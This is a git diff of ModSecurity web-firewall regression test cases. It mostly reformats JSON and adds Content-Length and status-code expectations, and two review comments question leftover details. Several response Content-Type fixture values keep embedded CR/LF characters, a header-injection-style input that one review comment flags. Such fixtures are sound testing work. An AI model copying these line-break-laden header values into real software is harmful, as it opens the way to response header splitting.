"rules":[ + "rules": [ "SecRuleEngine On", "SecRule WEBAPPID \"@contains test1\" \"id:1,phase:3,pass,t:trim\"", "Include test-cases/data/big-file.conf" ] }, { - "enabled":1, - "version_min":300000, - "title":"m_lineNumber ... mapping ... correct line number in file (2/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "m_lineNumber ... mapping ... 
correct line number in file (2/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "27", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "12", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=test2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"line \"55\"" + "expected": { + "error_log": "line \"55\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule WEBAPPID \"@contains test2\" \"id:1,phase:3,pass,t:trim\"", "Include test-cases/data/big-file.conf" ] }, { - "enabled":1, - "version_min":300000, - "title":"m_lineNumber ... mapping ... correct line number in file (3/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "m_lineNumber ... mapping ... 
correct line number in file (3/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "27", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "12", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=test3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"line \"84\"" + "expected": { + "error_log": "line \"84\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule WEBAPPID \"@contains test3\" \"id:1,phase:3,pass,t:trim\"", "Include test-cases/data/big-file.conf" ] }, { - "enabled":1, - "version_min":300000, - "title":"m_lineNumber ... mapping ... correct line number in file (4/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "m_lineNumber ... mapping ... 
correct line number in file (4/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "27", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "12", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=test4" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"line \"116\"" + "expected": { + "error_log": "line \"116\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule WEBAPPID \"@contains test3\" \"id:1,phase:3,pass,t:trim\"", "Include test-cases/data/big-file.conf" ] }, { - "enabled":1, - "version_min":300000, - "title":"m_lineNumber ... mapping ... correct line number in file (5/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "m_lineNumber ... mapping ... 
correct line number in file (5/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "27", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "12", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=test5" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"line \"174\"" + "expected": { + "error_log": "line \"174\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule WEBAPPID \"@contains test3\" \"id:1,phase:3,pass,t:trim\"", "Include test-cases/data/big-file.conf" ] }, { - "enabled":1, - "version_min":300000, - "title":"m_lineNumber ... mapping ... correct line number in file (6/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "m_lineNumber ... mapping ... 
correct line number in file (6/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "27", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "12", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=test5" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"line \"174\"" + "expected": { + "error_log": "line \"174\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule WEBAPPID \"@contains test3\" \"id:1,phase:3,pass,t:trim\"", "Include test-cases/data/not-so-big-file.conf" ] } ] - diff --git a/test/test-cases/regression/issue-1850.json b/test/test-cases/regression/issue-1850.json index 75ac2bc5f6..d32f3d1a68 100644 --- a/test/test-cases/regression/issue-1850.json +++ b/test/test-cases/regression/issue-1850.json @@ -4,7 +4,7 @@ "version_min": 209000, "version_max": -1, "title": "Override the default status code if not suitable to redirect action", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1850", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1850", "client": { "ip": "200.249.12.31", "port": 2313 
@@ -17,7 +17,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -25,18 +25,24 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?foo=£&bar=%C2%A3", + "uri": "/test.pl?foo=£&bar=%C2%A3", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" - } + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { "http_code": 302 diff --git a/test/test-cases/regression/issue-1941.json b/test/test-cases/regression/issue-1941.json index 0410ddad84..9a2ebfc88f 100644 --- a/test/test-cases/regression/issue-1941.json +++ b/test/test-cases/regression/issue-1941.json @@ -4,8 +4,35 @@ "version_min": 209000, "version_max": -1, "title": "Failed to load locate the unicode map file from: ... 1/n", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1941", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1941", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, "expected": { + "http_code": 200, "parser_error": "Failed to locate the unicode map file from: does-not-exist-unicode.mapping" }, "rules": [ 
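Review bot: The response `Content-Type` value in the +25 hunk of issue-1850.json still ends in `\n\r` (`"text/xml; charset=utf-8\n\r"`), although the neighbouring `Content-Length` was normalised from `"length\n\r"` to `"0"` in the same change. If the harness passes header values to the engine verbatim, this case feeds it a header value with embedded line-break characters, which is only worth doing on purpose. If it is not deliberate, `"Content-Type": "text/xml; charset=utf-8"` would match the cleaned-up sibling; if it is, the case title should say so. The same value is kept in the issue-1941.json hunks at +147 and +208 and the issue-1943.json hunks at +24 and +84.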
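Review bot: `"http_code": 200` is added to `expected` next to `parser_error` in the +4 hunk of issue-1941.json, together with empty `client`, `server`, `request` and `response` objects. These cases expect the rule set to fail to load, so presumably no transaction runs and the status code is never compared. If so, the extra field reads as an assertion that is not actually checked. Consider keeping `expected` to the `parser_error` entry alone for parser-failure cases, or confirm that the harness does evaluate `http_code` here. The hunks at +45 and +86 of the same file add the same fields.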
@@ -18,9 +45,36 @@ "version_min": 209000, "version_max": -1, "title": "Failed to load locate the unicode map file from: ... 2/n", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1941", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1941", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, "expected": { - "parser_error": "Failed to locate the unicode map file from: um dois tres does-not-exist-unicode.mapping" + "http_code": 200, + "parser_error": "Failed to locate the unicode map file from: um dois tres does-not-exist-unicode.mapping" }, "rules": [ "SecRuleEngine On", @@ -32,9 +86,36 @@ "version_min": 209000, "version_max": -1, "title": "Failed to load locate the unicode map file from: ... 3/n", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1941", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1941", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, "expected": { - "parser_error": "Invalid input: SecUnicodeMapFile does-not-exist-unicode.mapping eita" + "http_code": 200, + "parser_error": "Invalid input: SecUnicodeMapFile does-not-exist-unicode.mapping eita" }, "rules": [ "SecRuleEngine On", 
@@ -57,8 +138,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -66,27 +147,30 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2&pparam=дор", + "uri": "/test.pl?param1= test ¶m2=test2&pparam=дор", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { 
@@ -115,8 +199,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -124,27 +208,30 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2&pparam=дор", + "uri": "/test.pl?param1= test ¶m2=test2&pparam=дор", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { diff --git a/test/test-cases/regression/issue-1943.json b/test/test-cases/regression/issue-1943.json index 7dd688d556..9a906dd507 100644 --- a/test/test-cases/regression/issue-1943.json +++ b/test/test-cases/regression/issue-1943.json 
@@ -15,8 +15,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -24,27 +24,30 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2&pparam=дор", + "uri": "/test.pl?param1= test ¶m2=test2&pparam=дор", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { 
@@ -72,8 +75,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -81,31 +84,33 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2&pparam=дор", + "uri": "/test.pl?param1= test ¶m2=test2&pparam=дор", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "debug_log": "", "http_code": 200 }, "rules": [ diff --git a/test/test-cases/regression/issue-1956.json b/test/test-cases/regression/issue-1956.json index ead45da2a0..587f822a6d 100644 --- a/test/test-cases/regression/issue-1956.json +++ b/test/test-cases/regression/issue-1956.json 
@@ -1,190 +1,215 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "ctl:ruleRemoveById doesn't handle all ranges equally 1", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1956", - "gihub_issue": 1956, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "ctl:ruleRemoveById doesn't handle all ranges equally 1", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1956", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { - "Host": "www.google.com" + "Host": "www.google.com", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=)", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=)", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", "debug_log": "Rule id: 913104 was skipped due to a ruleRemoveById", - "error_log": "" + "http_code": 200 }, - "rules": [ + "rules": [ "SecRule REQUEST_URI \"@beginsWith /test\" \"id:1001,phase:request,pass,nolog,t:none,ctl:ruleRemoveById=913103-913105\"", "SecRule REQUEST_URI \"@beginsWith /test\" \"id:913104,phase:request,pass,nolog,t:none,msg:'whee'\"" ] }, { - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "ctl:ruleRemoveById doesn't handle all ranges equally 2", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1956", - "gihub_issue": 1956, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": 
"ctl:ruleRemoveById doesn't handle all ranges equally 2", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1956", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { - "Host": "www.google.com" + "Host": "www.google.com", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=)", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=)", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", "debug_log": "Rule id: 913104 was skipped due to a ruleRemoveById", - "error_log": "" + "http_code": 200 }, - "rules": [ + "rules": [ "SecRule REQUEST_URI \"@beginsWith /test\" \"id:1001,phase:request,pass,nolog,t:none,ctl:ruleRemoveById=913104\"", "SecRule REQUEST_URI \"@beginsWith /test\" \"id:913104,phase:request,pass,nolog,t:none,msg:'whee'\"" ] }, { - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "ctl:ruleRemoveById doesn't handle all ranges equally 3", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1956", - "gihub_issue": 1956, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "ctl:ruleRemoveById doesn't handle all ranges equally 3", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1956", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { - "Host": "www.google.com" + "Host": "www.google.com", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=)", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", 
- "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=)", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", "debug_log": "Rule id: 913103 was skipped due to a ruleRemoveById", - "error_log": "" + "http_code": 200 }, - "rules": [ + "rules": [ "SecRule REQUEST_URI \"@beginsWith /test\" \"id:1001,phase:request,pass,nolog,t:none,ctl:ruleRemoveById=913103-913105\"", "SecRule REQUEST_URI \"@beginsWith /test\" \"id:913103,phase:request,pass,nolog,t:none,msg:'whee'\"" ] }, { - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "ctl:ruleRemoveById doesn't handle all ranges equally 4", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1956", - "gihub_issue": 1956, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "ctl:ruleRemoveById doesn't handle all ranges equally 4", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1956", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { - "Host": "www.google.com" + "Host": "www.google.com", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=)", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=)", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", "debug_log": "Rule id: 913105 was skipped due to a ruleRemoveById", - "error_log": "" + "http_code": 200 }, - "rules": [ + "rules": [ "SecRule REQUEST_URI \"@beginsWith /test\" 
\"id:1001,phase:request,pass,nolog,t:none,ctl:ruleRemoveById=913103-913105\"", "SecRule REQUEST_URI \"@beginsWith /test\" \"id:913105,phase:request,pass,nolog,t:none,msg:'whee'\"" ] }, { - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "ctl:ruleRemoveById doesn't handle all ranges equally 5", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1956", - "gihub_issue": 1956, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "ctl:ruleRemoveById doesn't handle all ranges equally 5", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1956", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { - "Host": "www.google.com" + "Host": "www.google.com", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=)", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=)", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", "debug_log": "Rule: 913102. Executing operator", - "error_log": "" + "http_code": 200 }, - "rules": [ + "rules": [ "SecRule REQUEST_URI \"@beginsWith /test\" \"id:1001,phase:request,pass,nolog,t:none,ctl:ruleRemoveById=913103-913105\"", "SecRule REQUEST_URI \"@beginsWith /test\" \"id:913102,phase:request,pass,nolog,t:none,msg:'whee'\"" ] diff --git a/test/test-cases/regression/issue-1960.json b/test/test-cases/regression/issue-1960.json index 5b288977cd..14de7d66d4 100644 --- a/test/test-cases/regression/issue-1960.json +++ b/test/test-cases/regression/issue-1960.json 
@@ -1,37 +1,42 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleEngine DetectionOnly with disruptive SecDefaultAction", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleEngine DetectionOnly with disruptive SecDefaultAction", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host": "localhost" + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0" }, - "uri":"?a=a", - "method":"GET" + "uri": "?a=a", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecDefaultAction \"phase:1,deny,status:403\"", "SecRule ARGS \"@rx a\" \"id:1,phase:1,block" diff --git a/test/test-cases/regression/issue-2000.json b/test/test-cases/regression/issue-2000.json index 05610b457d..4e7972a3a3 100644 --- a/test/test-cases/regression/issue-2000.json +++ b/test/test-cases/regression/issue-2000.json 
